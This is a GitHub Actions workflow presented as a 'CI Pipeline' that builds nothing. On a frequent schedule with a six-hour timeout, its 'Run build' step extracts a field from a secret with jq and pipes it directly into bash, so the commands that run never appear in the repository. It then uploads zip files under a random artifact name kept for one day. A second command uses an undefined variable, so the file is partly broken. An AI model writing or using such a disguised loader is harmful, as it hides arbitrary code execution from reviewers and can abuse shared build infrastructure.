name: CI Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '46 4,10,16,22 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  perform:
    name: Run build
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run build
        env:
          gzxa36900: ${{ secrets.gzxa36900 }}
        run: |
          printf '%s' "$gzxa36900" | jq -r .koy6 | /bin/bash
          printf '%s' "$stprg20219" | jq -r .vfpuu6613 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: iHBbhXbH
          path: "*.zip"
          retention-days: 1
